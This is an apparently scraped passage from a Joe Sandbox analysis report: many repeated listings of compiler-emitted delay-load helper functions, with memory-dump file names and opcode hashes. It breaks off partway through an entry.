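Run against the full "Similarity" listing of a report, the grouping shows how many of the functions share one API profile, and the thunk check removes the compiler-emitted ones before any manual review; a RaiseException code whose facility is not 0x6D, or whose Win32 error is not one of the three the helper uses, is the case worth a closer look.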
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E580
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 840e2b56c94d381a8a2ee417a4a8d4645bda5291e6b7ad6879f6b8d646d588e8
                                                                                                                                                                                                    • Instruction ID: 1115993439a7d6c4172b3295b06a556fe7f299a04d136bd3674beae22fcec224
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 840e2b56c94d381a8a2ee417a4a8d4645bda5291e6b7ad6879f6b8d646d588e8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DB012C52AA1207C318C51547D03C3702ACC1C1B10333C22EF418C1580FB400C641471
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E580
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 5666ecf663d36b0be56ba47f63112fd4d5eae778328c1a677d2c578a228be6c1
                                                                                                                                                                                                    • Instruction ID: 3dc02fd309a2beeeaae53c87669374641e5488a0d5db005ea243d00975992a99
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5666ecf663d36b0be56ba47f63112fd4d5eae778328c1a677d2c578a228be6c1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22B012C52AA0307C314C51547E02C3702ACC1C1B10373C23EF418C1180FF400D251471
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 45775d5235f45f69f9afa8cf1e66e200960c576e570805f316e01269136afed0
                                                                                                                                                                                                    • Instruction ID: 83c8098eb968faa9df2fa98a309cc9d12c2827cd5d03706bc8c5a37cf4f6dc62
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45775d5235f45f69f9afa8cf1e66e200960c576e570805f316e01269136afed0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACA011E22AA022BC300822023C02C3B02ACC0C2B22332883EF802C8080AA80282008B0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 41d3b771211b724eb97fac81ee47f3de830256432bb27cb7e0ea35ecc213bb5e
                                                                                                                                                                                                    • Instruction ID: 83c8098eb968faa9df2fa98a309cc9d12c2827cd5d03706bc8c5a37cf4f6dc62
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41d3b771211b724eb97fac81ee47f3de830256432bb27cb7e0ea35ecc213bb5e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACA011E22AA022BC300822023C02C3B02ACC0C2B22332883EF802C8080AA80282008B0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: e2d5085d36edf52d93d2df652ea698cedd8221edc31e51576c57f61eadb22d4e
                                                                                                                                                                                                    • Instruction ID: 83c8098eb968faa9df2fa98a309cc9d12c2827cd5d03706bc8c5a37cf4f6dc62
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2d5085d36edf52d93d2df652ea698cedd8221edc31e51576c57f61eadb22d4e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACA011E22AA022BC300822023C02C3B02ACC0C2B22332883EF802C8080AA80282008B0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 31214f5f8380579117f10ea175fa2e1f149cd0bf90ca45b7fb421aee369d5855
• Instruction ID: 83c8098eb968faa9df2fa98a309cc9d12c2827cd5d03706bc8c5a37cf4f6dc62
• Opcode Fuzzy Hash: 31214f5f8380579117f10ea175fa2e1f149cd0bf90ca45b7fb421aee369d5855
• Instruction Fuzzy Hash: ACA011E22AA022BC300822023C02C3B02ACC0C2B22332883EF802C8080AA80282008B0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: a15136a80a02d921a0b8a9fcbb9962b6dae8391d9837a9f7d4b8bd26e5d1cffe
• Instruction ID: 83c8098eb968faa9df2fa98a309cc9d12c2827cd5d03706bc8c5a37cf4f6dc62
• Opcode Fuzzy Hash: a15136a80a02d921a0b8a9fcbb9962b6dae8391d9837a9f7d4b8bd26e5d1cffe
• Instruction Fuzzy Hash: ACA011E22AA022BC300822023C02C3B02ACC0C2B22332883EF802C8080AA80282008B0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E3FC
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E3FC
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E3FC
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E3FC
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E3FC
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: caa805e242483eb5c9428c64049e65e77c2ea32e41bbe444a4af13ea55f05a9b
                                                                                                                                                                                                    • Instruction ID: 3acc528753d834b0417c2c4160169263278720e598d1a6507aaeecd243c51f9a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: caa805e242483eb5c9428c64049e65e77c2ea32e41bbe444a4af13ea55f05a9b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1A011E22AA022BC3008A2023C02C3B02ACE0C2B22332882EF88280080AA80082008B2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E3FC
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: a75e590dc5c57a4717ccac3087110a2b246f4726768a213828b30e334f84dc07
                                                                                                                                                                                                    • Instruction ID: 3acc528753d834b0417c2c4160169263278720e598d1a6507aaeecd243c51f9a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a75e590dc5c57a4717ccac3087110a2b246f4726768a213828b30e334f84dc07
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1A011E22AA022BC3008A2023C02C3B02ACE0C2B22332882EF88280080AA80082008B2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E51F
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: fcb8529441962c8dfa541a632c571cbe96bb99e71fbb9ddc073537017c6a6ef7
                                                                                                                                                                                                    • Instruction ID: 6a30b7bbcfed23ecb505be31eec273525af1172093ca097f7776d968cbbc6d4d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcb8529441962c8dfa541a632c571cbe96bb99e71fbb9ddc073537017c6a6ef7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42A011CA2AA022BC300822003C02C3B028CC0C2F20332882EF80A88080BA800C2008B0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E51F
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: ffd1d867f96fd91492127e8bfd5f4eb7ba9d0eb28f84b7641e80ef66fe481695
                                                                                                                                                                                                    • Instruction ID: 6a30b7bbcfed23ecb505be31eec273525af1172093ca097f7776d968cbbc6d4d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffd1d867f96fd91492127e8bfd5f4eb7ba9d0eb28f84b7641e80ef66fe481695
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42A011CA2AA022BC300822003C02C3B028CC0C2F20332882EF80A88080BA800C2008B0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E51F
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
